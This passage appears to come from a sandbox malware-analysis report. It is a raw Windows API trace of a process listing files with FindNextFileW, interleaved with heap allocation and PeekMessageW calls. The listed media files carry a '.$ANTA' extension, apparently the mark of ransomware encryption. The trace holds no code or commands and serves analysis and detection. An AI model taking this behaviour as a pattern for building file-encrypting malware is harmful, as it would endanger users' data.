dwReserved1=0x43ca2e0, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0100.640] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbdaf4c0, ftCreationTime.dwHighDateTime=0x1d5f099, ftLastAccessTime.dwLowDateTime=0x81cb3cc, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x81cb3cc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca2e0, cFileName="..", cAlternateFileName="")) returned 1 [0100.640] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64b6969, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x64b6969, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x67d7c1d, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x139e0, dwReserved0=0x0, dwReserved1=0x43ca2e0, cFileName="8PG6kQ2SW4h7w.flv.$ANTA", cAlternateFileName="8PG6KQ~1.$AN")) returned 1 [0100.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0100.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0100.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0100.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0100.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0100.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a030 | out: hHeap=0x1780000) returned 1 [0100.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0100.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0100.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.640] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0100.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0100.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0100.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.640] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0100.640] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.641] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.641] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0100.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0100.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca280 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca388 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0100.642] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.642] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.642] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68bc952, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x68bc952, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x6a3a263, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x9e50, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="9ua4aLpWeNEQZn vUIUd.mkv.$ANTA", cAlternateFileName="9UA4AL~1.$AN")) returned 1 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0100.642] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.643] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca280 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0100.643] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0100.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.643] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0100.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.644] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b915db, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x6b915db, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x6c5017c, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xa970, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="9zsS8CRW.avi.$ANTA", cAlternateFileName="9ZSS8C~1.$AN")) returned 1 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0100.644] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.644] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0100.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0100.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca400 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0100.645] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.645] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.645] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6da7620, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x6da7620, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x6e8c4d5, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x13b10, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="E8Q4uNIBQS8v.flv.$ANTA", cAlternateFileName="E8Q4UN~1.$AN")) returned 1 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0100.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0100.645] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0100.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0100.646] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0100.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0100.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0100.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0100.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0100.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0100.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0100.646] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0100.646] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.646] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe3b3f, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x6fe3b3f, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x71ad510, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xcaf0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="F0zOuSSpVPNmctC-N.swf.$ANTA", cAlternateFileName="F0ZOUS~1.$AN")) returned 1 [0100.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.646] HeapFree (in: 